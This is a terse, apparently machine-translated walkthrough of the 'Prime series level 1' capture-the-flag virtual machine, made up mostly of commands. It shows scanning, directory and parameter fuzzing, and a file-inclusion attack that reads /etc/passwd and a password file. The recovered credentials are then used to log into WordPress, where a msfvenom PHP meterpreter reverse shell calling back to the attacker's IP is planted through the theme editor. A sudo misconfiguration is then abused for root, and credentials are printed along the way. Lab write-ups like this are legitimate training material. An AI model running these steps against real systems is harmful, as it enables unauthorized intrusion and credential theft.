prime_ series_ level-1

Target download
The Internet NAT

arp-scan -l
nmap -p 1-65535 -A 192.168.194.157

visit http

dirb http://192.168.194.157

Reuse dirb Filter the tool with parameters
dirb http://192.168.194.157 -X .txt,.php,zip

fuzz
location.txt

page of php ：

• http://192.168.194.157/image.php

• http://192.168.194.157/index.php

wpscan Enumerate users

wpscan --url http://192.168.194.157/wordpress/   --enumerate u  

Get users victor

Use Kali Self contained wfuzz

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt  http://192.168.194.157/index.php?FUZZ

Filter

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.194.157/index.php?FUZZ 

Try out

http://192.168.194.157/index.php?file=location.txt

The correct parameter is secrettier360, Tried one before php no way , The other one is right

http://192.168.194.157/image.php?secrettier360=location.txt

Application

http://192.168.194.157/image.php?secrettier360=/etc/passwd

Use curl Line feed

curl http://192.168.194.157/image.php?secrettier360=/etc/passwd

http://192.168.194.157/image.php?secrettier360=/home/saket/password.txt

follow_the_ippsec

Backstage

http://192.168.194.157/wordpress/wp-login.php
victor
follow_the_ippsec

Theme editing area that can be written secret.php
Use msf Generate bounce shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.194.156 lport=7777 -o shell.php     
use exploit/multi/handler
set Payload php/meterpreter/reverse_tcp
set LHOST 192.168.194.156
set lport 7777
run

http://192.168.194.157/wordpress/wp-content/themes/twentynineteen/secret.php

Raise the right

Interaction shell

python -c 'import pty;pty.spawn("/bin/bash")'

Reference resources
/opt/backup/server_database
cat backup_pass

enc.txt

nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=

key.txt

I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.

tribute_to_ippsec

[email protected]:~$ sudo -l
sudo -l
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User saket may run the following commands on ubuntu:
    (root) NOPASSWD: /home/victor/undefeated_victor
[email protected]:~$ sudo /home/victor/undefeated_victor
sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
[email protected]:~$ cp /bin/bash /tmp/challenge
cp /bin/bash /tmp/challenge
[email protected]:~$ sudo /home/victor/undefeated_victor
sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
[email protected]:~# id
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# 

The principle of right raising , establish challenge file , take /bin/bash Write to file , Then execute again sudo /home/victor/undefeated_victor Command to get possession root The powers of the shell. Reference resources